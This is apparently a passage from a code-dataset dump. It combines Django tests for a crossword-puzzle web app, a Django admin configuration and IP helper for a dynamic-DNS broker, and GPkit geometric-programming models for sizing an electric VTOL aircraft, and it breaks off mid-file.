def test_edit_page_populated(self):
"""Check that the puzzle is pre-populated with existing contents for editing."""
create_puzzle_range()
self.client.login(username='super', password='password')
response = self.client.get(reverse('edit', args=['super', 1]))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content.count('class="light'.encode('utf-8')), 8)
self.assertEqual(response.content.count('class="block'.encode('utf-8')), (15 * 15) - 8)
self.assertEqual(response.content.count('clue-number'.encode('utf-8')), 4)
def test_unauthorised_user_no_save(self):
"""Make sure users can't POST data directly into other users' puzzles."""
get_user()
self.client.login(username='test', password='password')
response = self.client.post(reverse('save'), {'author': 'super', 'number': 1, 'ipuz': '{}'})
self.assertEqual(response.status_code, 403)
response = self.client.post(reverse('save'), {'author': 'notme', 'number': 1, 'ipuz': '{}'})
self.assertEqual(response.status_code, 403)
def test_save_new_puzzle(self):
"""Check that a valid POST of puzzle data gets stored in the database."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["A","B","C"],["M","#","N"],["X","Y","Z"]]' \
'}'
user = get_user()
self.client.login(username='test', password='password')
response = self.client.post(reverse('save'), {'author': '', 'number': '', 'ipuz': ipuz})
self.assertEqual(response.status_code, 200)
puz = Puzzle.objects.get(user=user, number=1)
entries = Entry.objects.filter(puzzle=puz).order_by('down', 'y', 'x')
self.assertEqual(len(entries), 4)
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'ab c',
'startx': 0, 'starty': 0, 'down': False})
self.verify_entry(entries[1], {'puzzle': puz, 'clue': '3a', 'answer': 'xyz',
'startx': 0, 'starty': 2, 'down': False})
self.verify_entry(entries[2], {'puzzle': puz, 'clue': '1d', 'answer': 'amx',
'startx': 0, 'starty': 0, 'down': True})
self.verify_entry(entries[3], {'puzzle': puz, 'clue': '2d', 'answer': 'c-nz',
'startx': 2, 'starty': 0, 'down': True})
self.client.logout()
def test_new_user_save_puzzle(self):
"""Check that new users can create credentials and save."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["A","B","C"],["M","#","N"],["X","Y","Z"]]' \
'}'
response = self.client.post(reverse('save'), {'author': '', 'number': '', 'ipuz': ipuz,
'username': 'Newbie', 'password': '<PASSWORD>',
'email': '<EMAIL>'})
self.assertEqual(response.status_code, 200)
user = User.objects.get(username='Newbie')
self.assertEqual(user.email, '<EMAIL>')
puz = Puzzle.objects.get(user=user, number=1)
self.assertEqual(len(Entry.objects.filter(puzzle=puz)), 4)
def test_existing_user_login_save(self):
"""Check that existing users can provide credentials and save."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["A","B","C"],["M","#","N"],["X","Y","Z"]]' \
'}'
user = get_user()
response = self.client.post(reverse('save'), {'author': '', 'number': '', 'ipuz': ipuz,
'username': user.username,
'password': 'password', 'email': ''})
self.assertEqual(response.status_code, 200)
puz = Puzzle.objects.get(user=user, number=1)
self.assertEqual(len(Entry.objects.filter(puzzle=puz)), 4)
def test_update_existing_puzzle(self):
"""Check that POSTed data can overwrite existing puzzle data."""
ipuz = '{' \
'"version":"http://ipuz.org/v2","kind":["http://ipuz.org/crossword#1"],' \
'"dimensions":{"width":3,"height":3},"showenumerations":true,' \
'"puzzle":[[1,0,2],[0,"#",0],[3,0,0]],' \
'"clues":{' \
'"Across":[' \
'{"number":1,"clue":"1a","enumeration":"2,1"},' \
'{"number":3,"clue":"3a","enumeration":"3"}],' \
'"Down":[' \
'{"number":1,"clue":"1d","enumeration":"3"},' \
'{"number":2,"clue":"2d","enumeration":"1-2"}]},' \
'"solution":[["D","E","F"],["M","#","N"],["X","Y","Z"]]' \
'}'
create_puzzle_range()
puz = Puzzle.objects.get(user=get_superuser(), number=1)
entries = Entry.objects.filter(puzzle=puz).order_by('down', 'y', 'x')
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'ab c',
'startx': 0, 'starty': 0, 'down': False})
self.client.login(username='super', password='password')
response = self.client.post(reverse('save'),
{'author': 'super', 'number': '1', 'ipuz': ipuz})
self.assertEqual(response.status_code, 302)
puz = Puzzle.objects.get(user=get_superuser(), number=1)
entries = Entry.objects.filter(puzzle=puz).order_by('down', 'y', 'x')
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'de f',
'startx': 0, 'starty': 0, 'down': False})
self.client.logout()
class PuzzleAdminTests(TestCase):
"""Tests for custom admin functionality."""
def verify_entry(self, entry, expected):
"""Helper to check that an individual entry matches expected parameters."""
self.assertEqual(entry.puzzle, expected['puzzle'])
self.assertEqual(entry.clue, expected['clue'])
self.assertEqual(entry.answer, expected['answer'])
self.assertEqual(entry.x, expected['startx'])
self.assertEqual(entry.y, expected['starty'])
self.assertEqual(entry.down, expected['down'])
def test_import_from_xml(self):
"""Import a test XML file and check the results."""
puz = Puzzle.objects.create(user=get_user())
import_from_xml('puzzle/test_data/small.xml', puz)
entries = Entry.objects.order_by('down', 'y', 'x')
self.verify_entry(entries[0], {'puzzle': puz, 'clue': '1a', 'answer': 'ab c',
'startx': 0, 'starty': 0, 'down': False})
self.verify_entry(entries[1], {'puzzle': puz, 'clue': '3a', 'answer': 'xyz',
'startx': 0, 'starty': 2, 'down': False})
self.verify_entry(entries[2], {'puzzle': puz, 'clue': '1d', 'answer': 'amx',
'startx': 0, 'starty': 0, 'down': True})
self.verify_entry(entries[3], {'puzzle': puz, 'clue': '2d', 'answer': 'c-nz',
'startx': 2, 'starty': 0, 'down': True})
def verify_block(self, block, blank, x_coord, y_coord):
"""Helper to check that an individual block matches expected parameters."""
self.assertEqual(block.blank, blank)
self.assertEqual(block.x, x_coord)
self.assertEqual(block.y, y_coord)
def verify_blocks_in_row(self, blocks, blank, row, expected_cols):
""" Helper to check that one row of a grid has blocks in the expected columns.
blocks - An array of block objects belonging to one row of the grid.
blank - The blank object they belong to.
row - The row number.
expected_cols - The column numbers which we expect to be blocks.
"""
self.assertEqual(len(blocks), len(expected_cols))
for idx, col in enumerate(expected_cols):
self.verify_block(blocks[idx], blank, col, row)
def test_import_from_ipuz(self):
"""Import a blank grid from an ipuz file and check the result."""
blank = Blank.objects.create()
file = open('puzzle/test_data/ettu.ipuz', 'rb')
import_blank_from_ipuz(file, blank)
blocks = Block.objects.order_by('y', 'x')
self.verify_blocks_in_row(blocks[0:1], blank, 0, [11])
self.verify_blocks_in_row(blocks[1:8], blank, 1, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[8:15], blank, 3, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[15:16], blank, 4, [5])
self.verify_blocks_in_row(blocks[16:25], blank, 5, [0, 1, 3, 4, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[25:26], blank, 6, [6])
self.verify_blocks_in_row(blocks[26:35], blank, 7, [1, 2, 3, 5, 7, 9, 11, 12, 13])
self.verify_blocks_in_row(blocks[35:36], blank, 8, [8])
self.verify_blocks_in_row(blocks[36:45], blank, 9, [1, 3, 5, 7, 9, 10, 11, 13, 14])
self.verify_blocks_in_row(blocks[46:53], blank, 11, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[53:60], blank, 13, [1, 3, 5, 7, 9, 11, 13])
self.verify_blocks_in_row(blocks[60:], blank, 14, [3])
file.close()
class VisitorLogTests(TestCase):
"""Tests for visitor logging when a puzzle is viewed."""
def test_log_visitor(self):
"""Check that one log entry per request is created."""
create_puzzle_range()
self.client.get('/')
self.client.get('/')
self.client.get('/')
self.assertEqual(Visitor.objects.count(), 3)
def test_limit_visitor_list(self):
"""Check that the 100 most recent visitors are kept in the log."""
create_puzzle_range()
start_time = timezone.now()
for i in range(150):
Visitor.objects.create(ip_addr='', user_agent='', path='', referrer='',
date=start_time + timedelta(minutes=i))
self.client.get('/')
self.assertEqual(Visitor.objects.count(), 100)
self.assertEqual(Visitor.objects.order_by('date').first().date,
start_time + timedelta(minutes=50))
self.assertEqual(Visitor.objects.order_by('date').last().date,
start_time + timedelta(minutes=149))
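# These suites run under Django's standard test runner, typically via
#   python manage.py test puzzle
# (the exact settings module depends on the project configuration).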
``` |
{
"source": "jomority/ddnsbroker",
"score": 2
} |
#### File: src/ddnsbroker/admin.py
```python
from django.contrib import admin
from django.contrib import messages
from ddnsbroker.models import Host, UpdateService, Record
class RecordInline(admin.TabularInline):
model = Record
class HostAdmin(admin.ModelAdmin):
fieldsets = (
(None, {
'fields': ('fqdn', 'secret', ('ipv4_enabled', 'ipv6_enabled'))
}),
('Manual IPs', {
'classes': ('collapse',),
'fields': ('ipv4', 'ipv6')
})
)
list_display = ('fqdn', 'ipv4_enabled', 'ipv6_enabled', 'ipv4', 'ipv6')
list_editable = ('ipv4_enabled', 'ipv6_enabled', 'ipv4', 'ipv6')
list_filter = ('ipv4_enabled', 'ipv6_enabled')
search_fields = ('fqdn',)
inlines = [RecordInline]
def add_view(self, request, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(HostAdmin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(HostAdmin, self).change_view(request, object_id, form_url, extra_context)
class RecordAdmin(admin.ModelAdmin):
fieldsets = (
(None, {
'fields': ('host', 'fqdn', ('ipv4_enabled', 'ipv6_enabled'))
}),
('Record composition', {
'fields': ('ipv4_netmask', 'ipv4_host_id', 'ipv6_netmask', 'ipv6_host_id')
}),
('Update service', {
'fields': ('service', 'username', 'password')
})
)
list_display = ('fqdn', 'host', 'ipv4_enabled', 'ipv6_enabled', 'effective_ipv4', 'effective_ipv6', 'service')
list_editable = ('ipv4_enabled', 'ipv6_enabled')
list_filter = (
('host', admin.RelatedOnlyFieldListFilter),
'ipv4_enabled',
'ipv6_enabled',
('service', admin.RelatedOnlyFieldListFilter)
)
save_as = True
save_as_continue = False
search_fields = ('fqdn', 'host__fqdn')
actions = ['update_records']
def update_records(self, request, queryset):  # TODO: maybe use an intermediate page, since updating many records could take a long time
for record in queryset:
pass
self.message_user(request, "This function is not yet implemented", level=messages.WARNING)
update_records.short_description = "Force update selected records"
def add_view(self, request, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(RecordAdmin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
extra_context = extra_context or {}
extra_context['updateServices'] = UpdateService.objects.all()
return super(RecordAdmin, self).change_view(request, object_id, form_url, extra_context)
class UpdateServiceAdmin(admin.ModelAdmin):
list_display = ('name', 'url')
search_fields = ('name', 'url')
admin.site.register(Host, HostAdmin)
admin.site.register(Record, RecordAdmin)
admin.site.register(UpdateService, UpdateServiceAdmin)
```
#### File: ddnsbroker/tools/ip.py
```python
from ipaddress import IPv6Address, AddressValueError
def normalize_ip(ip: str) -> str:
try:
ip6 = IPv6Address(ip)
ret = ip6.ipv4_mapped or ip6
return str(ret)
except AddressValueError:
return ip
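# Example behaviour (illustrative):
#   normalize_ip("::ffff:192.0.2.1") -> "192.0.2.1"   (IPv4-mapped unwrapped)
#   normalize_ip("2001:db8::1")      -> "2001:db8::1" (plain IPv6 unchanged)
#   normalize_ip("192.0.2.1")        -> "192.0.2.1"   (not IPv6, passed through)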
``` |
{
"source": "jomorlier/eVTOL",
"score": 3
} |
#### File: jomorlier/eVTOL/aircraft_models.py
```python
import math
import numpy as np
from gpkit import Variable, Model, Vectorize, ureg
from gpkit.constraints.bounded import Bounded
from standard_atmosphere import stdatmo
class OnDemandAircraft(Model):
def setup(self,autonomousEnabled=False):
TOGW = Variable("TOGW","lbf","Aircraft takeoff gross weight")
W_empty = Variable("W_{empty}","lbf","Weight without passengers or crew")
C_eff = Variable("C_{eff}","kWh","Effective battery capacity")
g = Variable("g",9.807,"m/s**2","Gravitational acceleration")
L_D_cruise = Variable("L_D_cruise","-","Cruise L/D ratio")
L_D_loiter = Variable("L_D_loiter","-","Loiter L/D ratio (approximation)")
eta_cruise = Variable("\eta_{cruise}","-","Cruise propulsive efficiency")
tailRotor_power_fraction_hover = Variable("tailRotor_power_fraction_hover",
0.001,"-","Tail-rotor power as a fraction of lifting-rotors power")
tailRotor_power_fraction_levelFlight = Variable("tailRotor_power_fraction_levelFlight",
0.001,"-","Tail-rotor power as a fraction of lifting-rotors power")
cost_per_weight = Variable("cost_per_weight","lbf**-1",
"Cost per unit empty weight of the aircraft")
purchase_price = Variable("purchase_price","-","Purchase price of the airframe")
vehicle_life = Variable("vehicle_life",20000*ureg.hour,"hours","Vehicle lifetime")
self.autonomousEnabled = autonomousEnabled
self.TOGW = TOGW
self.W_empty = W_empty
self.C_eff = C_eff
self.g = g
self.L_D_cruise = L_D_cruise
self.L_D_loiter = L_D_loiter
self.eta_cruise = eta_cruise
self.tailRotor_power_fraction_hover = tailRotor_power_fraction_hover
self.tailRotor_power_fraction_levelFlight = tailRotor_power_fraction_levelFlight
self.cost_per_weight = cost_per_weight
self.purchase_price = purchase_price
self.vehicle_life = vehicle_life
self.rotors = Rotors()
self.battery = Battery()
self.structure = Structure(self)
self.electricalSystem = ElectricalSystem()
self.avionics = Avionics(autonomousEnabled=autonomousEnabled)
self.components = [self.rotors,self.battery,self.structure,self.electricalSystem,self.avionics]
constraints = []
constraints += [g == self.battery.g]
constraints += [self.components]#all constraints implemented at component level
constraints += [L_D_loiter == ((3**0.5)/2.)*L_D_cruise]
constraints += [C_eff == self.battery.C_eff]#battery-capacity constraint
constraints += [W_empty >= sum(c.W for c in self.components)]#weight constraint
constraints += [purchase_price == cost_per_weight*self.structure.W]
return constraints
class Structure(Model):
def setup(self,aircraft):
TOGW = aircraft.TOGW
W = Variable("W","lbf","Empty weight")
weight_fraction = Variable("weight_fraction","-","Empty weight fraction")
self.W = W
self.weight_fraction = weight_fraction
return [W == weight_fraction*TOGW]
class Rotors(Model):
def performance(self,flightState):
return RotorsAero(self,flightState)
def setup(self):
R = Variable("R","ft","Propeller radius")
D = Variable("D","ft","Propeller diameter")
A = Variable("A","ft^2","Area of 1 rotor disk")
A_total = Variable("A_{total}","ft^2","Combined area of all rotor disks")
N = Variable("N","-","Number of rotors")
s = Variable("s",0.1,"-","Propeller solidity")
Cl_mean_max = Variable("Cl_{mean_{max}}","-","Maximum allowed mean lift coefficient")
W = Variable("W",0,"lbf","Rotor weight") #weight model not implemented yet
self.R = R
self.D = D
self.A = A
self.A_total = A_total
self.N = N
self.s = s
self.Cl_mean_max = Cl_mean_max
self.W = W
constraints = [A == math.pi*R**2, D==2*R, A_total==N*A,
Cl_mean_max == Cl_mean_max]  # trivial self-equality keeps Cl_mean_max in the model
return constraints
class RotorsAero(Model):
def setup(self,rotors,flightState):
T = Variable("T","lbf","Total thrust")
T_perRotor = Variable("T_perRotor","lbf","Thrust per rotor")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per rotor")
P = Variable("P","kW","Total power")
P_perRotor = Variable("P_perRotor","kW","Power per rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
MT_max = Variable("MT_max",0.9,"-","Maximum allowed tip Mach number")
CT = Variable("CT","-","Thrust coefficient")
CQ = Variable("CQ","-","Torque coefficient")
CP = Variable("CP","-","Power coefficient")
CPi = Variable("CPi","-","Induced (ideal) power coefficient")
CPp = Variable("CPp","-","Profile power coefficient")
Cl_mean = Variable("Cl_mean","-","Mean lift coefficient")
FOM = Variable("FOM","-","Figure of merit")
ki = Variable("ki",1.2,"-","Induced power factor")
Cd0 = Variable("Cd0",0.01,"-","Blade two-dimensional zero-lift drag coefficient")
p_ratio = Variable("p_{ratio}","-","Sound pressure ratio (p/p_{ref})")
x = Variable("x",500,"ft","Distance from source at which to calculate sound")
k3 = Variable("k3",6.804e-3,"s**3/ft**3","Sound-pressure constant")
R = rotors.R
A = rotors.A
A_total = rotors.A_total
N = rotors.N
s = rotors.s
Cl_mean_max = rotors.Cl_mean_max
rho = flightState.rho
a = flightState.a
self.T = T
self.T_perRotor = T_perRotor
self.T_A = T_A
self.Q_perRotor = Q_perRotor
self.P = P
self.P_perRotor = P_perRotor
self.VT = VT
self.omega = omega
self.MT = MT
self.MT_max = MT_max
self.CT = CT
self.CQ = CQ
self.CP = CP
self.CPi = CPi
self.CPp = CPp
self.Cl_mean = Cl_mean
self.FOM = FOM
self.ki = ki
self.Cd0 = Cd0
self.p_ratio = p_ratio
self.x = x
self.k3 = k3
constraints = [flightState]
#Top-level constraints
constraints += [T == N * T_perRotor,
P == N * P_perRotor]
constraints += [T_perRotor == 0.5*rho*(VT**2)*A*CT,
P_perRotor == 0.5*rho*(VT**3)*A*CP]
constraints += [T_A == T/A_total]
#Torque
constraints += [CQ == CP]
constraints += [Q_perRotor == 0.5*rho*(VT**2)*A*R*CQ]
#Performance model
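#With CT and CP nondimensionalized by 0.5*rho*VT^2*A (VT^3 for power),
#momentum theory gives the ideal induced power CPi = CT**1.5 / 2 and the
#profile power CPp = s*Cd0 / 4; total CP inflates the induced term by ki.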
constraints += [CPi == 0.5*CT**1.5,
CPp == 0.25*s*Cd0,
CP >= ki*CPi + CPp,
FOM == CPi / CP]
#Tip-speed constraints (upper limit on VT)
constraints += [VT == R*omega,
VT == MT * a,
MT <= MT_max]
#Mean lift coefficient constraints (lower limit on VT)
constraints += [Cl_mean == 3*CT/s,
Cl_mean <= Cl_mean_max]
#Noise model
constraints += [p_ratio == k3*((T*omega)/(rho*x))*(N*s)**-0.5]
return constraints
class Battery(Model):
def performance(self):
return BatteryPerformance(self)
#Requires a substitution or constraint for g (gravitational acceleration)
def setup(self):
g = Variable("g","m/s**2","Gravitational acceleration")
C = Variable("C","kWh","Battery capacity")
C_eff = Variable("C_{eff}","kWh","Effective battery capacity")
usable_energy_fraction = Variable("usable_energy_fraction",0.8,
"-","Percentage of the battery energy that can be used without damaging battery")
W = Variable("W","lbf","Battery weight")
m = Variable("m","kg","Battery mass")
C_m = Variable("C_m","Wh/kg","Battery energy density")
P_m = Variable("P_m",3000*ureg.W/ureg.kg,"W/kg","Battery power density")
P_max = Variable("P_{max}","kW","Battery maximum power")
cost_per_C = Variable("cost_per_C","kWh**-1","Battery cost per unit energy stored")
purchase_price = Variable("purchase_price","-","Purchase price of the battery")
cycle_life = Variable("cycle_life",2000,"-",
"Number of cycles before battery needs replacement")
self.g = g
self.C = C
self.C_eff = C_eff
self.usable_energy_fraction = usable_energy_fraction
self.W = W
self.m = m
self.C_m = C_m
self.P_m = P_m
self.P_max = P_max
self.cost_per_C = cost_per_C
self.purchase_price = purchase_price
self.cycle_life = cycle_life
constraints = []
constraints += [C==m*C_m, W==m*g]
constraints += [C_eff == usable_energy_fraction*C, P_max==P_m*m]
constraints += [purchase_price == cost_per_C*C]
return constraints
class BatteryPerformance(Model):
def setup(self,battery):
E = Variable("E","kWh","Electrical energy used during segment")
P = Variable("P","kW","Power draw during segment")
t = Variable("t","s","Time over which battery is providing power")
self.E = E
self.P = P
self.t = t
constraints = [E==P*t, P<=battery.P_max]
return constraints
class Crew(Model):
def setup(self,mission_type="piloted"):
W_oneCrew = Variable("W_{oneCrew}",190,"lbf","Weight of 1 crew member")
N_crew = Variable("N_{crew}",1,"-","Number of crew members (if present)")
constraints = []
if mission_type == "autonomous":
W = Variable("W",0,"lbf","Total weight")
if mission_type == "piloted":
W = Variable("W","lbf","Total weight")
constraints += [W == N_crew*W_oneCrew]
self.W_oneCrew = W_oneCrew
self.N_crew = N_crew
self.W = W
return constraints
class Passengers(Model):
def setup(self):
W_onePassenger = Variable("W_{onePassenger}",200,"lbf","Weight of 1 passenger")
N_passengers = Variable("N_{passengers}","-","Number of passengers")
W = Variable("W","lbf","Total weight")
self.W_onePassenger = W_onePassenger
self.N_passengers = N_passengers
self.W = W
return [W == N_passengers*W_onePassenger]
class ElectricalSystem(Model):
def performance(self):
return ElectricalSystemPerformance(self)
def setup(self):
W = Variable("W",0,"lbf","Electrical power system weight")
eta = Variable("\eta","-","Electrical power system efficiency")
self.W = W
self.eta = eta
constraints = []
return constraints
class ElectricalSystemPerformance(Model):
def setup(self,electricalSystem):
P_in = Variable("P_{in}","kW","Input power (from the battery)")
P_out = Variable("P_{out}","kW","Output power (to the motor or motors)")
eta = electricalSystem.eta
self.P_in = P_in
self.P_out = P_out
self.eta = eta
constraints = []
constraints += [P_out == eta*P_in]
return constraints
class Avionics(Model):
def setup(self,autonomousEnabled=False):
W = Variable("W",0,"lbf","Weight of the avionics")
if autonomousEnabled:
purchase_price = Variable("purchase_price",60000,"-",
"Purchase price of the avionics (Uber estimate)")
else:
purchase_price = Variable("purchase_price",1,"-",
"Purchase price of the avionics (negligibly small)")
self.purchase_price = purchase_price
self.W = W
constraints = []
return constraints
class FlightState(Model):
def setup(self,h):
atmospheric_data = stdatmo(h)
rho = atmospheric_data["\rho"].to(ureg.kg/ureg.m**3)
a = atmospheric_data["a"].to(ureg.ft/ureg.s)
rho = Variable("\rho",rho,"kg/m^3","Air density")
a = Variable("a",a,"ft/s","Speed of sound")
self.rho = rho
self.a = a
constraints = []
return constraints
class Hover(Model):
#t should be set via substitution
def setup(self,mission,aircraft,state):
E = Variable("E","kWh","Electrical energy used during hover segment")
P_battery = Variable("P_{battery}","kW","Power drawn (from batteries) during hover segment")
P_rotors = Variable("P_{rotors}","kW","Power used (by lifting rotors) during hover segment")
P_tailRotor = Variable("P_{tailRotor}","kW","Power used (by tail rotor) during hover segment")
tailRotor_power_fraction = Variable("tailRotor_power_fraction",
"-","Tail-rotor power as a fraction of lifting-rotors power")
T = Variable("T","lbf","Total thrust (from rotors) during hover segment")
T_A = Variable("T/A","lbf/ft**2","Disk loading during hover segment")
t = Variable("t","s","Time in hover segment")
W = mission.W
self.E = E
self.P_battery = P_battery
self.P_rotors = P_rotors
self.P_tailRotor = P_tailRotor
self.tailRotor_power_fraction = tailRotor_power_fraction
self.T = T
self.T_A = T_A
self.t = t
self.W = W
self.rotorPerf = aircraft.rotors.performance(state)
self.batteryPerf = aircraft.battery.performance()
self.electricalSystemPerf = aircraft.electricalSystem.performance()
constraints = []
constraints += [self.rotorPerf, self.batteryPerf, self.electricalSystemPerf]
constraints += [P_rotors==self.rotorPerf.P,T==self.rotorPerf.T,
T_A==self.rotorPerf.T_A]
constraints += [self.electricalSystemPerf.P_in == P_battery,
self.electricalSystemPerf.P_out >= P_rotors + P_tailRotor]
constraints += [E==self.batteryPerf.E,t==self.batteryPerf.t,
P_battery==self.batteryPerf.P]
constraints += [T == W]
constraints += [P_tailRotor == tailRotor_power_fraction*P_rotors]
return constraints
class LevelFlight(Model):
#Substitution required for either segment_range or t (loiter time).
def setup(self,mission,aircraft):
E = Variable("E","kWh","Electrical energy used during level-flight segment")
P_battery = Variable("P_{battery}","kW","Power drawn (from batteries) during segment")
P_cruise = Variable("P_{cruise}","kW","Power used (by propulsion system) during cruise segment")
P_tailRotor = Variable("P_{tailRotor}","kW","Power used (by tail rotor) during hover segment")
tailRotor_power_fraction = Variable("tailRotor_power_fraction",
"-","Tail-rotor power as a fraction of cruise power")
T = Variable("T","lbf","Thrust during level-flight segment")
D = Variable("D","lbf","Drag during level-flight segment")
t = Variable("t","s","Time in level-flight segment")
segment_range = Variable("segment_range","nautical_mile",
"Distance travelled during segment")
V = Variable("V","mph","Velocity during segment")
L_D = Variable("L_D","-","Segment lift-to-drag ratio")
W = mission.W
eta_cruise = aircraft.eta_cruise
self.E = E
self.P_battery = P_battery
self.P_cruise = P_cruise
self.P_tailRotor = P_tailRotor
self.tailRotor_power_fraction = tailRotor_power_fraction
self.T = T
self.D = D
self.t = t
self.segment_range = segment_range
self.V = V
self.L_D = L_D
constraints = []
self.batteryPerf = aircraft.battery.performance()
self.electricalSystemPerf = aircraft.electricalSystem.performance()
constraints += [self.batteryPerf, self.electricalSystemPerf]
constraints += [E==self.batteryPerf.E, P_battery==self.batteryPerf.P,
t==self.batteryPerf.t]
constraints += [self.electricalSystemPerf.P_in == P_battery,
self.electricalSystemPerf.P_out >= P_cruise + P_tailRotor]
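#Steady level flight: distance = V*t; shaft power at efficiency eta_cruise
#supplies thrust power T*V; thrust balances drag; and weight = (L/D)*drag.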
constraints += [segment_range==V*t,eta_cruise*P_cruise==T*V,T==D,W==L_D*D]
constraints += [P_tailRotor == tailRotor_power_fraction*P_cruise]
return constraints
class TimeOnGround(Model):
#Mission segment for charging and passenger drop-off/pick-up
def setup(self,mission):
E_mission = mission.E_mission
t = Variable("t","s","Time spent on ground")
t_passenger = Variable("t_{passenger}",5,"minute",
"Time required to load/unload passengers and conduct safety checks")
t_charge = Variable("t_{charge}","s","Time required to fully charge the battery")
charger_power = Variable("charger_power","kW","Charger power")
eta_charger = Variable("\eta_{charger}",0.9,"-","Charging efficiency")
E_charger = Variable("E_{charger}","kWh","Energy supplied by charger")
self.t = t
self.t_passenger = t_passenger
self.t_charge = t_charge
self.charger_power = charger_power
self.eta_charger = eta_charger
self.E_charger = E_charger
constraints = []
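#Ground time is bounded below by both passenger turnaround and recharge time, so the longer of the two drives t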
constraints += [t >= t_passenger, t >= t_charge]
constraints += [E_mission == eta_charger*E_charger]
constraints += [E_charger == charger_power*t_charge]
return constraints
class OnDemandSizingMission(Model):
#Mission the aircraft must be able to fly. No economic analysis.
def setup(self,aircraft,reserve_type="FAA_heli",mission_type="piloted"):
if not(aircraft.autonomousEnabled) and (mission_type != "piloted"):
raise ValueError("Autonomy is not enabled for Aircraft() model.")
W = Variable("W_{mission}","lbf","Weight of the aircraft during the mission")
mission_range = Variable("mission_range","nautical_mile","Mission range")
t_hover = Variable("t_{hover}","s","Time in hover")
E_mission = Variable("E_{mission}","kWh","Electrical energy used during mission")
V_cruise = Variable("V_{cruise}","mph","Aircraft cruising speed")
V_loiter = Variable("V_{loiter}","mph","Aircraft loiter speed")
T_A = Variable("T/A","lbf/ft**2","Disk loading")
C_eff = aircraft.battery.C_eff #effective battery capacity
self.W = W
self.mission_range = mission_range
self.t_hover = t_hover
self.E_mission = E_mission
self.V_cruise = V_cruise
self.V_loiter = V_loiter
self.T_A = T_A
self.mission_type = mission_type
self.crew = Crew(mission_type=mission_type)
self.passengers = Passengers()
hoverState = FlightState(h=0*ureg.ft)
constraints = []
self.fs0 = Hover(self,aircraft,hoverState) #takeoff
self.fs1 = LevelFlight(self,aircraft) #fly to destination
self.fs2 = LevelFlight(self,aircraft) #reserve
constraints += [self.fs1.L_D == aircraft.L_D_cruise]
constraints += [self.fs1.V == V_cruise]
#Reserve segment
if reserve_type == "FAA_aircraft" or reserve_type == "FAA_heli":
constraints += [self.fs2.L_D == aircraft.L_D_loiter]
constraints += [self.fs2.V == V_loiter]
if reserve_type == "FAA_aircraft":
#30-minute loiter time, as per VFR rules for aircraft (daytime only)
t_loiter = Variable("t_{loiter}",30,"minutes","Loiter time")
elif reserve_type == "FAA_heli":
#20-minute loiter time, as per VFR rules for helicopters
t_loiter = Variable("t_{loiter}",20,"minutes","Loiter time")
self.t_loiter = t_loiter
constraints += [t_loiter == self.fs2.t]
if reserve_type == "Uber":#2-nautical-mile diversion distance; used by McDonald & German
constraints += [self.fs2.L_D == aircraft.L_D_cruise]
constraints += [self.fs2.V == V_cruise]
R_divert = Variable("R_{divert}",2,"nautical_mile","Diversion distance")
self.R_divert = R_divert
constraints += [R_divert == self.fs2.segment_range]
self.fs3 = Hover(self,aircraft,hoverState)#landing again
self.flight_segments = [self.fs0, self.fs1, self.fs2, self.fs3]
self.levelFlight_segments = [self.fs1, self.fs2]
self.hover_segments = [self.fs0, self.fs3] #not including loiter
#Power and energy consumption by mission segment
with Vectorize(len(self.flight_segments)):
P_battery = Variable("P_{battery}","kW","Segment power draw")
E = Variable("E","kWh","Segment energy use")
#Data from hover segments
with Vectorize(len(self.hover_segments)):
CT = Variable("CT","-","Thrust coefficient")
CP = Variable("CP","-","Power coefficient")
Q_perRotor = Variable("Q_perRotor","lbf*ft","Torque per lifting rotor")
T_perRotor = Variable("T_perRotor","lbf","Thrust per lifting rotor")
P = Variable("P","kW","Total power supplied to all lifting rotors")
P_perRotor = Variable("P_perRotor","kW","Power per lifting rotor")
VT = Variable("VT","ft/s","Propeller tip speed")
omega = Variable("\omega","rpm","Propeller angular velocity")
MT = Variable("MT","-","Propeller tip Mach number")
